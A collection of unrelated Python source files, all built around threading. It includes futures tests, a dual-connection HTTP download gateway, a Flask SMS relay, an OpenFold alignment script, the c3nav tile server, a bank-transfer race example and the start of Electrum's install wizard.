loop.call_soon_threadsafe(loop.stop)
t.join()
@pytest.mark.filterwarnings(
'ignore:coroutine .* was never awaited:RuntimeWarning')
def test_coroutine_no_event_loop_specified():
async def do_async():
return 42
with pytest.raises(ValueError, match='no event loop specified'):
ts.Future(do_async())
def test_gc_result_cycle(gc_tester):
obj = []
f = ts.Future(obj)
obj.append(f)
gc_tester(f)
def test_gc_callback_cycle(gc_tester):
def callback(f):
del f
pass
promise, future = ts.Promise.new()
future.add_done_callback(callback)
callback.future = future
callback.promise = promise
gc_tester(future)
def test_promise_instantiation():
with pytest.raises(TypeError):
ts.Promise()
def test_write_futures_instantiation():
with pytest.raises(TypeError):
ts.WriteFutures()
def test_pickle_failure():
p, f = ts.Promise.new()
with pytest.raises(TypeError):
pickle.dumps(p)
with pytest.raises(TypeError):
pickle.dumps(f)
|
Gateway_v1.py
|
from http.server import ThreadingHTTPServer, SimpleHTTPRequestHandler
from requests_toolbelt.adapters.source import SourceAddressAdapter
from datetime import datetime, timezone
import config.config as cfg
import requests as req
import logging as log
from socket import *
import threading
import ssl
# init gateway info
GATEWAY_IP = cfg.primary['ip']
GATEWAY_PORT = cfg.primary['port']
# init test server info
TEST_SERVER_IP = cfg.server['ip']
TEST_SERVER_PORT = str(cfg.server['port'])
# init connection info
PRIMARY_IP = cfg.primary['ip']
PRIMARY_PORT = cfg.primary['port']
SECOND_IP = cfg.secondary['ip']
SECOND_PORT = cfg.secondary['port']
IS_SECOND_AVAILABLE = True
# init request info
REQUESTED_HOSTNAME = ''
REQUESTED_PATH = ''
REQUESTED_PORT = cfg.requested['httpPort']
HTTP_VERSION = cfg.requested['httpVersion']
IS_ACCEPT_RANGE = True
IS_VERIFY = False
CONTENT_LENGTH = 0
CONTENT_TYPE = ""
# init timestamps
CURRENT_TIME = datetime.now(timezone.utc).timestamp()
START_STAMP_PRIMARY = CURRENT_TIME
END_STAMP_PRIMARY = CURRENT_TIME
START_STAMP_SECOND = CURRENT_TIME
END_STAMP_SECOND = CURRENT_TIME
REQUEST_RECV_TIME = CURRENT_TIME
REQUEST_HANDLE_TIME = CURRENT_TIME
# init range boundaries
PRIMARY_RANGE_END = 0
SECOND_RANGE_START = 0
SECOND_LOAD = 0
# init get request responses to keep them as bytes
RESPONSE_PRIMARY = b""
RESPONSE_SECOND = b""
RESPONSE = b""
# init head request response
HEAD_RESPONSE_HEADERS = None
# init socket request headers
SOCKET_HEAD_HEADERS = ""
SOCKET_GET_HEADERS = ""
# constants to create headers
LINE = "\r\n"
HEADER = LINE + LINE
def handleRequest(self):
assignRequestInfo(self.path[1:])
createSocketHeadHeaders()
measureBandwidth()
assignContentInfo()
calculateLoadWeight()
log.info("++++ Head requests are done ++++")
createSocketGetHeaders()
sendRangeRequest()
pushBackToClient(self)
# Assign request info
# Requested string comes in the format of http://site/path or https://site/path
def assignRequestInfo(requested):
global HTTP_VERSION, REQUESTED_PORT, REQUESTED_HOSTNAME, REQUESTED_PATH, IS_VERIFY
HTTP_VERSION = requested.split(":")[0] + "://"
if HTTP_VERSION.__contains__("s"):
IS_VERIFY = True
REQUESTED_PORT = cfg.requested['httpsPort']
REQUESTED_HOSTNAME = requested.split("//")[1].split("/")[0]
if REQUESTED_HOSTNAME.__contains__(":"):
REQUESTED_HOSTNAME = REQUESTED_HOSTNAME.split(":")[0]
REQUESTED_PORT = 8080
REQUESTED_PATH = '/'
try:
REQUESTED_PATH += requested.split("//")[1].split("/", 1)[1]
except:
log.error("No path was found")
# Create headers to send HEAD request over socket using Secondary Connection
def createSocketHeadHeaders():
global SOCKET_HEAD_HEADERS
SOCKET_HEAD_HEADERS = "HEAD " + REQUESTED_PATH + " HTTP/1.1" + LINE
SOCKET_HEAD_HEADERS += "Host: " + REQUESTED_HOSTNAME + LINE
SOCKET_HEAD_HEADERS += "Accept: */*" + LINE
SOCKET_HEAD_HEADERS += "User-Agent: kibitzer" + LINE
SOCKET_HEAD_HEADERS += "Connection: Close" + HEADER
# Measure bandwidth using HEAD requests over two connections
def measureBandwidth():
defaultThread = threading.Thread(target=sendHeadPrimary)
mobileThread = threading.Thread(target=sendHeadSecondary)
defaultThread.start()
mobileThread.start()
defaultThread.join()
mobileThread.join()
# Send HEAD request over Primary Connection
def sendHeadPrimary():
log.info("*** Primary head is started")
global START_STAMP_PRIMARY, HEAD_RESPONSE_HEADERS, END_STAMP_PRIMARY
START_STAMP_PRIMARY = getCurrentTime()
if REQUESTED_PORT == 8080:
URL = HTTP_VERSION + REQUESTED_HOSTNAME + ":8080" + REQUESTED_PATH
else:
URL = HTTP_VERSION + REQUESTED_HOSTNAME + REQUESTED_PATH
HEAD_RESPONSE_HEADERS = req.head(URL, verify=IS_VERIFY)
END_STAMP_PRIMARY = getCurrentTime()
HEAD_RESPONSE_HEADERS = HEAD_RESPONSE_HEADERS.headers
log.info("*** Primary head is done")
def getCurrentTime():
return datetime.now(timezone.utc).timestamp()
# Send HEAD request over Secondary Connection
def sendHeadSecondary():
log.info("--- Secondary head is started")
global IS_SECOND_AVAILABLE
try:
con = socket(AF_INET, SOCK_STREAM)
con.bind((SECOND_IP, SECOND_PORT))
if IS_VERIFY:
sendHeadSecondaryHttps(con)
else:
sendHeadSecondaryHttp(con)
log.info("--- Secondary head is done")
except:
log.info("--- Second connection was not found")
IS_SECOND_AVAILABLE = False
# Send HEAD request to HTTPS sources
def sendHeadSecondaryHttps(con):
global START_STAMP_SECOND, END_STAMP_SECOND
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_default_certs()
ssl_socket = context.wrap_socket(con, server_hostname=REQUESTED_HOSTNAME)
ssl_socket.connect((REQUESTED_HOSTNAME, REQUESTED_PORT))
START_STAMP_SECOND = getCurrentTime()
ssl_socket.sendall(SOCKET_HEAD_HEADERS.encode("utf-8"))
ssl_socket.recv(10)
END_STAMP_SECOND = getCurrentTime()
ssl_socket.close()
con.close()
# Send HEAD request to HTTP
def sendHeadSecondaryHttp(con):
global START_STAMP_SECOND, END_STAMP_SECOND
con.connect((REQUESTED_HOSTNAME, REQUESTED_PORT))
START_STAMP_SECOND = getCurrentTime()
con.sendall(SOCKET_HEAD_HEADERS.encode('utf-8'))
con.recv(10)
END_STAMP_SECOND = getCurrentTime()
con.close()
# Check HEAD request responses and assign content info
def assignContentInfo():
global IS_ACCEPT_RANGE, CONTENT_LENGTH, CONTENT_TYPE
try:
if HEAD_RESPONSE_HEADERS["accept-ranges"].lower() == "none":
IS_ACCEPT_RANGE = False
except:
log.error("Accept-Range header was not found")
IS_ACCEPT_RANGE = False
try:
CONTENT_LENGTH = int(HEAD_RESPONSE_HEADERS["content-length"])
except:
log.error("Content-Length header was not found")
try:
CONTENT_TYPE = HEAD_RESPONSE_HEADERS["content-type"]
except:
log.error("Content-Type header was not found")
# Calculate load weight over timestamps
def calculateLoadWeight():
global PRIMARY_RANGE_END, SECOND_RANGE_START, SECOND_LOAD
primaryStamp = END_STAMP_PRIMARY - START_STAMP_PRIMARY
secondaryStamp = END_STAMP_SECOND - START_STAMP_SECOND
log.info("*** Primary stamp: %s", str(round(primaryStamp, 2)))
log.info("--- Secondary stamp: %s", str(round(secondaryStamp, 2)))
if secondaryStamp != 0:
defaultLoadRate = round((secondaryStamp / (primaryStamp + secondaryStamp)), 2)
else:
defaultLoadRate = 1
PRIMARY_RANGE_END = round(defaultLoadRate * CONTENT_LENGTH)
log.info("Content-Length: %s", str(CONTENT_LENGTH))
log.info("*** Primary load length: %s bytes / %s MB", str(PRIMARY_RANGE_END),
str(round(convertToMb(PRIMARY_RANGE_END), 2)))
log.info("--- Secondary load length: %s bytes / %s MB", str(CONTENT_LENGTH - PRIMARY_RANGE_END - 1),
str(round(convertToMb(CONTENT_LENGTH - PRIMARY_RANGE_END - 1), 2)))
SECOND_RANGE_START = PRIMARY_RANGE_END + 1
SECOND_LOAD = CONTENT_LENGTH - SECOND_RANGE_START
def convertToMb(num):
return num / (1024 * 1024)
# Create headers to send GET request over socket using Secondary Connection
def createSocketGetHeaders():
global SOCKET_GET_HEADERS
SOCKET_GET_HEADERS = "GET " + REQUESTED_PATH + " HTTP/1.1" + LINE
SOCKET_GET_HEADERS += "Host: " + REQUESTED_HOSTNAME + LINE
SOCKET_GET_HEADERS += "Accept: */*" + LINE
SOCKET_GET_HEADERS += "User-Agent: kibitzer" + LINE
SOCKET_GET_HEADERS += "Range: bytes=" + str(SECOND_RANGE_START) + "-" + str(CONTENT_LENGTH - 1) + LINE
SOCKET_GET_HEADERS += "Connection: Close" + HEADER
# Send GET requests over two connection as Range Requests
def sendRangeRequest():
global RESPONSE
defaultThread = threading.Thread(target=sendGetPrimary)
if IS_SECOND_AVAILABLE and IS_ACCEPT_RANGE:
mobileThread = threading.Thread(target=sendGetSecondary)
mobileThread.start()
defaultThread.start()
defaultThread.join()
if IS_SECOND_AVAILABLE and IS_ACCEPT_RANGE:
mobileThread.join()
RESPONSE = RESPONSE_PRIMARY + RESPONSE_SECOND
# Send GET request over Primary Connection
def sendGetPrimary():
log.info("*** Primary GET is started")
global RESPONSE_PRIMARY
headers = {
"Host": REQUESTED_HOSTNAME, "Accept": "*/*",
"User-Agent": "kibitzer", 'Connection': 'Close'
}
if IS_ACCEPT_RANGE:
rangeValue = 'bytes=0-' + str(PRIMARY_RANGE_END)
headers.update({'Range': rangeValue})
if REQUESTED_PORT == 8080:
URL = HTTP_VERSION + REQUESTED_HOSTNAME + ":8080" + REQUESTED_PATH
else:
URL = HTTP_VERSION + REQUESTED_HOSTNAME + REQUESTED_PATH
RESPONSE_PRIMARY = req.get(URL,
headers=headers, verify=True).content
log.info("*** Primary GET is done")
# Send GET request over Secondary Connection
def sendGetSecondary():
log.info("--- Secondary GET is started")
global RESPONSE_SECOND
headers = {
"Host": REQUESTED_HOSTNAME, "Accept": "*/*",
"User-Agent": "kibitzer", 'Connection': 'Close'
}
if IS_ACCEPT_RANGE:
rangeValue = "bytes=" + str(SECOND_RANGE_START) + "-" + str(CONTENT_LENGTH - 1)
headers.update({'Range': rangeValue})
if REQUESTED_PORT == 8080:
URL = HTTP_VERSION + REQUESTED_HOSTNAME + ":8080" + REQUESTED_PATH
else:
URL = HTTP_VERSION + REQUESTED_HOSTNAME + REQUESTED_PATH
s = req.Session()
s.mount('http://', SourceAddressAdapter(SECOND_IP))
RESPONSE_SECOND = s.get(URL, headers=headers, verify=True).content
# con = socket(AF_INET, SOCK_STREAM)
# con.bind((SECOND_IP, SECOND_PORT + 1))
# if IS_VERIFY:
# sendGetHttps(con)
# else:
# sendGetHttp(con)
# try:
# con.close()
# except Exception as e:
# print(str(e))
log.info("--- Secondary GET is done")
# Send GET request to HTTPS
def sendGetHttps(con):
global RESPONSE_SECOND
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_default_certs()
ssl_socket = context.wrap_socket(con, server_hostname=REQUESTED_HOSTNAME)
ssl_socket.connect((REQUESTED_HOSTNAME, REQUESTED_PORT))
ssl_socket.sendall(SOCKET_GET_HEADERS.encode("utf-8"))
count = 0
while True:
if count >= SECOND_LOAD:
print("------ break equal------------")
break
data = ssl_socket.recv(10000)
if not data:
print("------ break no data------------")
break
count += len(data)
RESPONSE_SECOND += data
RESPONSE_SECOND = RESPONSE_SECOND.split(HEADER.encode("utf-8"), 1)[1]
ssl_socket.close()
con.close()
# Send GET request to HTTP
def sendGetHttp(con):
global RESPONSE_SECOND
con.connect((REQUESTED_HOSTNAME, REQUESTED_PORT))
con.sendall(SOCKET_GET_HEADERS.encode("utf-8"))
count = 0
while True:
if count >= SECOND_LOAD:
print("------ break equal------------")
break
data = con.recv(10000)
if not data:
print("------ break no data------------")
break
count += len(data)
RESPONSE_SECOND += data
RESPONSE_SECOND = RESPONSE_SECOND.split(HEADER.encode("utf-8"), 1)[1]
con.close()
# Push back GET request responses to client
def pushBackToClient(self):
global REQUEST_HANDLE_TIME
self.send_response(200)
self.send_header('Content-Type', CONTENT_TYPE)
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-Length', str(CONTENT_LENGTH))
self.end_headers()
self.wfile.write(RESPONSE)
log.info("Response is pushed back to client")
REQUEST_HANDLE_TIME = getCurrentTime()
log.info("Total time passed: %s seconds", str(round(REQUEST_HANDLE_TIME - REQUEST_RECV_TIME, 2)))
class Proxy(SimpleHTTPRequestHandler):
def do_GET(self):
global REQUEST_RECV_TIME
if self.path.startswith("/http"):
log.info("Gateway got a new request")
REQUEST_RECV_TIME = getCurrentTime()
handleRequest(self)
log.info("---------------------------------------------------------------------\n")
else:
log.error("Undefined format")
log.basicConfig(filename='D:\\PyCharm Projects\\Senior\\src\\log_records\\gateway_v1.log', level=log.DEBUG, format='%(asctime)s - %(message)s')
connection = ThreadingHTTPServer((GATEWAY_IP, GATEWAY_PORT), Proxy)
connection.serve_forever()
|
app.py
|
import functools
import os
import threading
from flask import (
Flask,
request
)
import telia
app = Flask(__name__)
app.config.from_object("config")
def check_auth(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if request.is_json:
data = request.get_json()
if "auth" in data:
if data["auth"] == app.config["AUTH_KEY"]:
return func(*args, **kwargs)
else:
return "Unauthorized", 401
return "Bad request", 400
return wrapper
def send_sms(message, contact):
api = telia.TeliaAPI(app.config["TELIA_USERNAME"], app.config["TELIA_PASSWORD"])
api.send_sms(message, [contact])
api.session.close()
@app.route("/", methods=["POST"])
@check_auth
def index():
if request.is_json:
data = request.get_json()
threading.Thread(target=send_sms, args=(data["message"], data["contact"])).start()
return "OK"
else:
return "Bad request", 400
if __name__ == "__main__":
app.run()
|
precompute_alignments.py
|
import argparse
from functools import partial
import json
import logging
import os
import threading
from multiprocessing import cpu_count
from shutil import copyfile
import tempfile
import openfold.data.mmcif_parsing as mmcif_parsing
from openfold.data.data_pipeline import AlignmentRunner
from openfold.data.parsers import parse_fasta
from openfold.np import protein, residue_constants
from utils import add_data_args
logging.basicConfig(level=logging.WARNING)
def run_seq_group_alignments(seq_groups, alignment_runner, args):
dirs = set(os.listdir(args.output_dir))
for seq, names in seq_groups:
first_name = names[0]
alignment_dir = os.path.join(args.output_dir, first_name)
try:
os.makedirs(alignment_dir)
except Exception as e:
logging.warning(f"Failed to create directory for {first_name} with exception {e}...")
continue
fd, fasta_path = tempfile.mkstemp(suffix=".fasta")
with os.fdopen(fd, 'w') as fp:
fp.write(f'>query\n{seq}')
try:
alignment_runner.run(
fasta_path, alignment_dir
)
except:
logging.warning(f"Failed to run alignments for {first_name}. Skipping...")
os.remove(fasta_path)
os.rmdir(alignment_dir)
continue
os.remove(fasta_path)
for name in names[1:]:
if(name in dirs):
logging.warning(
f'{name} has already been processed. Skipping...'
)
continue
cp_dir = os.path.join(args.output_dir, name)
os.makedirs(cp_dir, exist_ok=True)
for f in os.listdir(alignment_dir):
copyfile(os.path.join(alignment_dir, f), os.path.join(cp_dir, f))
def parse_and_align(files, alignment_runner, args):
for f in files:
path = os.path.join(args.input_dir, f)
file_id = os.path.splitext(f)[0]
seq_group_dict = {}
if(f.endswith('.cif')):
with open(path, 'r') as fp:
mmcif_str = fp.read()
mmcif = mmcif_parsing.parse(
file_id=file_id, mmcif_string=mmcif_str
)
if(mmcif.mmcif_object is None):
logging.warning(f'Failed to parse {f}...')
if(args.raise_errors):
raise list(mmcif.errors.values())[0]
else:
continue
mmcif = mmcif.mmcif_object
for chain_letter, seq in mmcif.chain_to_seqres.items():
chain_id = '_'.join([file_id, chain_letter])
l = seq_group_dict.setdefault(seq, [])
l.append(chain_id)
elif(f.endswith('.fasta') or f.endswith('.fa')):
with open(path, 'r') as fp:
fasta_str = fp.read()
input_seqs, _ = parse_fasta(fasta_str)
if len(input_seqs) != 1:
msg = f'More than one input_sequence found in {f}'
if(args.raise_errors):
raise ValueError(msg)
else:
logging.warning(msg)
input_sequence = input_seqs[0]
seq_group_dict[input_sequence] = [file_id]
elif(f.endswith('.core')):
with open(path, 'r') as fp:
core_str = fp.read()
core_prot = protein.from_proteinnet_string(core_str)
aatype = core_prot.aatype
seq = ''.join([
residue_constants.restypes_with_x[aatype[i]]
for i in range(len(aatype))
])
seq_group_dict[seq] = [file_id]
else:
continue
seq_group_tuples = [(k,v) for k,v in seq_group_dict.items()]
run_seq_group_alignments(seq_group_tuples, alignment_runner, args)
def main(args):
# Build the alignment tool runner
alignment_runner = AlignmentRunner(
jackhmmer_binary_path=args.jackhmmer_binary_path,
hhblits_binary_path=args.hhblits_binary_path,
hhsearch_binary_path=args.hhsearch_binary_path,
uniref90_database_path=args.uniref90_database_path,
mgnify_database_path=args.mgnify_database_path,
bfd_database_path=args.bfd_database_path,
uniclust30_database_path=args.uniclust30_database_path,
pdb70_database_path=args.pdb70_database_path,
use_small_bfd=args.bfd_database_path is None,
no_cpus=args.cpus_per_task,
)
files = list(os.listdir(args.input_dir))
# Do some filtering
if(args.mmcif_cache is not None):
with open(args.mmcif_cache, "r") as fp:
cache = json.load(fp)
else:
cache = None
dirs = []
if(cache is not None and args.filter):
dirs = set(os.listdir(args.output_dir))
def prot_is_done(f):
prot_id = os.path.splitext(f)[0]
if(prot_id in cache):
chain_ids = cache[prot_id]["chain_ids"]
for c in chain_ids:
full_name = prot_id + "_" + c
if(not full_name in dirs):
return False
else:
return False
return True
files = [f for f in files if not prot_is_done(f)]
def split_up_arglist(arglist):
# Split up the survivors
if(os.environ.get("SLURM_JOB_NUM_NODES", 0)):
num_nodes = int(os.environ["SLURM_JOB_NUM_NODES"])
if(num_nodes > 1):
node_id = int(os.environ["SLURM_NODEID"])
logging.warning(f"Num nodes: {num_nodes}")
logging.warning(f"Node ID: {node_id}")
arglist = arglist[node_id::num_nodes]
t_arglist = []
for i in range(args.no_tasks):
t_arglist.append(arglist[i::args.no_tasks])
return t_arglist
if(cache is not None and "seqs" in next(iter(cache.values()))):
seq_group_dict = {}
for f in files:
prot_id = os.path.splitext(f)[0]
if(prot_id in cache):
prot_cache = cache[prot_id]
chains_seqs = zip(
prot_cache["chain_ids"], prot_cache["seqs"]
)
for chain, seq in chains_seqs:
chain_name = prot_id + "_" + chain
if(chain_name not in dirs):
l = seq_group_dict.setdefault(seq, [])
l.append(chain_name)
func = partial(run_seq_group_alignments,
alignment_runner=alignment_runner,
args=args
)
seq_groups = [(k,v) for k,v in seq_group_dict.items()]
# Sort them by group length so the tasks are approximately balanced
seq_groups = sorted(seq_groups, key=lambda x: len(x[1]))
task_arglist = [[a] for a in split_up_arglist(seq_groups)]
else:
func = partial(parse_and_align,
alignment_runner=alignment_runner,
args=args,
)
task_arglist = [[a] for a in split_up_arglist(files)]
threads = []
for i, task_args in enumerate(task_arglist):
print(f"Started thread {i}...")
t = threading.Thread(target=func, args=task_args)
threads.append(t)
t.start()
for t in threads:
t.join()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"input_dir", type=str,
help="""Path to directory containing mmCIF, FASTA and/or ProteinNet
.core files"""
)
parser.add_argument(
"output_dir", type=str,
help="Directory in which to output alignments"
)
add_data_args(parser)
parser.add_argument(
"--raise_errors", action="store_true", default=False,
help="Whether to crash on parsing errors"
)
parser.add_argument(
"--cpus_per_task", type=int, default=cpu_count(),
help="Number of CPUs to use"
)
parser.add_argument(
"--mmcif_cache", type=str, default=None,
help="Path to mmCIF cache. Used to filter files to be parsed"
)
parser.add_argument(
"--no_tasks", type=int, default=1,
)
parser.add_argument(
"--filter", type=bool, default=True,
)
args = parser.parse_args()
main(args)
|
wsgi.py
|
import base64
import logging
import multiprocessing
import os
import pickle
import re
import threading
import time
from datetime import datetime
from email.utils import formatdate
from io import BytesIO
import requests
import pylibmc
from c3nav.mapdata.utils.cache import CachePackage
from c3nav.mapdata.utils.tiles import (build_access_cache_key, build_base_cache_key, build_tile_etag, get_tile_bounds,
parse_tile_access_cookie)
loglevel = logging.DEBUG if os.environ.get('C3NAV_DEBUG') else os.environ.get('LOGLEVEL', 'INFO')
logging.basicConfig(level=loglevel,
format='[%(asctime)s] [%(process)s] [%(levelname)s] %(name)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S %z')
logger = logging.getLogger('c3nav')
if os.environ.get('C3NAV_LOGFILE'):
logging.basicConfig(filename=os.environ['C3NAV_LOGFILE'])
class TileServer:
def __init__(self):
self.path_regex = re.compile(r'^/(\d+)/(-?\d+)/(-?\d+)/(-?\d+).png$')
self.cookie_regex = re.compile(r'(^| )c3nav_tile_access="?([^;" ]+)"?')
try:
self.upstream_base = os.environ['C3NAV_UPSTREAM_BASE'].strip('/')
except KeyError:
raise Exception('C3NAV_UPSTREAM_BASE needs to be set.')
try:
self.data_dir = os.environ.get('C3NAV_DATA_DIR', 'data')
except KeyError:
raise Exception('C3NAV_DATA_DIR needs to be set.')
if not os.path.exists(self.data_dir):
os.mkdir(self.data_dir)
self.tile_secret = os.environ.get('C3NAV_TILE_SECRET', None)
if not self.tile_secret:
tile_secret_file = None
try:
tile_secret_file = os.environ['C3NAV_TILE_SECRET_FILE']
self.tile_secret = open(tile_secret_file).read().strip()
except KeyError:
raise Exception('C3NAV_TILE_SECRET or C3NAV_TILE_SECRET_FILE need to be set.')
except FileNotFoundError:
raise Exception('The C3NAV_TILE_SECRET_FILE (%s) does not exist.' % tile_secret_file)
self.reload_interval = int(os.environ.get('C3NAV_RELOAD_INTERVAL', 60))
self.http_auth = os.environ.get('C3NAV_HTTP_AUTH', None)
if self.http_auth:
self.http_auth = self.http_auth.split(':', 1)
self.auth_headers = {'X-Tile-Secret': base64.b64encode(self.tile_secret.encode()).decode()}
self.cache_package = None
self.cache_package_etag = None
self.cache_package_filename = None
cache = self.get_cache_client()
wait = 1
while True:
success = self.load_cache_package(cache=cache)
if success:
logger.info('Cache package successfully loaded.')
break
logger.info('Retrying after %s seconds...' % wait)
time.sleep(wait)
wait = min(10, wait*2)
threading.Thread(target=self.update_cache_package_thread, daemon=True).start()
@staticmethod
def get_cache_client():
return pylibmc.Client(["127.0.0.1"], binary=True, behaviors={"tcp_nodelay": True, "ketama": True})
def update_cache_package_thread(self):
cache = self.get_cache_client() # different thread โ different client!
while True:
time.sleep(self.reload_interval)
self.load_cache_package(cache=cache)
def get_date_header(self):
return 'Date', formatdate(timeval=time.time(), localtime=False, usegmt=True)
def load_cache_package(self, cache):
logger.debug('Downloading cache package from upstream...')
try:
headers = self.auth_headers.copy()
if self.cache_package_etag is not None:
headers['If-None-Match'] = self.cache_package_etag
r = requests.get(self.upstream_base+'/map/cache/package.tar.xz', headers=headers, auth=self.http_auth)
if r.status_code == 403:
logger.error('Rejected cache package download with Error 403. Tile secret is probably incorrect.')
return False
if r.status_code == 401:
logger.error('Rejected cache package download with Error 401. You have HTTP Auth active.')
return False
if r.status_code == 304:
if self.cache_package is not None:
logger.debug('Not modified.')
cache['cache_package_filename'] = self.cache_package_filename
return True
logger.error('Unexpected not modified.')
return False
r.raise_for_status()
except Exception as e:
logger.error('Cache package download failed: %s' % e)
return False
logger.debug('Recieving and loading new cache package...')
try:
self.cache_package = CachePackage.read(BytesIO(r.content))
self.cache_package_etag = r.headers.get('ETag', None)
except Exception as e:
logger.error('Cache package parsing failed: %s' % e)
return False
try:
self.cache_package_filename = os.path.join(
self.data_dir,
datetime.now().strftime('%Y-%m-%d_%H-%M-%S-%f')+'.pickle'
)
with open(self.cache_package_filename, 'wb') as f:
pickle.dump(self.cache_package, f)
cache.set('cache_package_filename', self.cache_package_filename)
except Exception as e:
self.cache_package_etag = None
logger.error('Saving pickled package failed: %s' % e)
return False
return True
def not_found(self, start_response, text):
start_response('404 Not Found', [self.get_date_header(),
('Content-Type', 'text/plain'),
('Content-Length', str(len(text)))])
return [text]
def internal_server_error(self, start_response, text=b'internal server error'):
start_response('500 Internal Server Error', [self.get_date_header(),
('Content-Type', 'text/plain'),
('Content-Length', str(len(text)))])
return [text]
def deliver_tile(self, start_response, etag, data):
start_response('200 OK', [self.get_date_header(),
('Content-Type', 'image/png'),
('Content-Length', str(len(data))),
('Cache-Control', 'no-cache'),
('ETag', etag)])
return [data]
def get_cache_package(self):
try:
cache_package_filename = self.cache.get('cache_package_filename')
except pylibmc.Error as e:
logger.warning('pylibmc error in get_cache_package(): %s' % e)
cache_package_filename = None
if cache_package_filename is None:
logger.warning('cache_package_filename went missing.')
return self.cache_package
if self.cache_package_filename != cache_package_filename:
logger.debug('Loading new cache package in worker.')
self.cache_package_filename = cache_package_filename
with open(self.cache_package_filename, 'rb') as f:
self.cache_package = pickle.load(f)
return self.cache_package
cache_lock = multiprocessing.Lock()
@property
def cache(self):
cache = self.get_cache_client()
self.__dict__['cache'] = cache
return cache
def __call__(self, env, start_response):
path_info = env['PATH_INFO']
match = self.path_regex.match(path_info)
if match is None:
return self.not_found(start_response, b'invalid tile path.')
level, zoom, x, y = match.groups()
zoom = int(zoom)
if not (-2 <= zoom <= 5):
return self.not_found(start_response, b'zoom out of bounds.')
# do this to be thread safe
try:
cache_package = self.get_cache_package()
except Exception as e:
logger.error('get_cache_package() failed: %s' % e)
return self.internal_server_error(start_response)
# check if bounds are valid
x = int(x)
y = int(y)
minx, miny, maxx, maxy = get_tile_bounds(zoom, x, y)
if not cache_package.bounds_valid(minx, miny, maxx, maxy):
return self.not_found(start_response, b'coordinates out of bounds.')
# get level
level = int(level)
level_data = cache_package.levels.get(level)
if level_data is None:
return self.not_found(start_response, b'invalid level.')
# build cache keys
last_update = level_data.history.last_update(minx, miny, maxx, maxy)
base_cache_key = build_base_cache_key(last_update)
# decode access permissions
access_permissions = set()
access_cache_key = '0'
cookie = env.get('HTTP_COOKIE', None)
if cookie:
cookie = self.cookie_regex.search(cookie)
if cookie:
cookie = cookie.group(2)
access_permissions = (parse_tile_access_cookie(cookie, self.tile_secret) &
set(level_data.restrictions[minx:maxx, miny:maxy]))
access_cache_key = build_access_cache_key(access_permissions)
# check browser cache
if_none_match = env.get('HTTP_IF_NONE_MATCH')
tile_etag = build_tile_etag(level, zoom, x, y, base_cache_key, access_cache_key, self.tile_secret)
if if_none_match == tile_etag:
start_response('304 Not Modified', [self.get_date_header(),
('Content-Length', '0'),
('ETag', tile_etag)])
return [b'']
cache_key = path_info+'_'+tile_etag
cached_result = self.cache.get(cache_key)
if cached_result is not None:
return self.deliver_tile(start_response, tile_etag, cached_result)
r = requests.get('%s/map/%d/%d/%d/%d/%s.png' % (self.upstream_base, level, zoom, x, y, access_cache_key),
headers=self.auth_headers, auth=self.http_auth)
if r.status_code == 200 and r.headers['Content-Type'] == 'image/png':
self.cache.set(cache_key, r.content)
return self.deliver_tile(start_response, tile_etag, r.content)
start_response('%d %s' % (r.status_code, r.reason), [
self.get_date_header(),
('Content-Length', str(len(r.content))),
('Content-Type', r.headers.get('Content-Type', 'text/plain'))
])
return [r.content]
application = TileServer()
|
main.py
|
import time
import threading
from bank.account import Account
from bank.actions import transfer_money, charge_bank_fees
def run_example() -> None:
jan_account = Account(holder="Jan", money_amount=1_000)
alicja_account = Account(holder="Alicja", money_amount=1_000)
print(jan_account)
print(alicja_account)
threading.Thread(target=transfer_money, args=(jan_account, alicja_account, 1_000)).start()
threading.Thread(target=charge_bank_fees, args=(jan_account, 500)).start()
time.sleep(5)
print(jan_account)
print(alicja_account)
if __name__ == "__main__":
run_example()
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage
from electrum.util import UserCancelled, InvalidPassword, WalletFileException
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum.plugin import run_hook
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
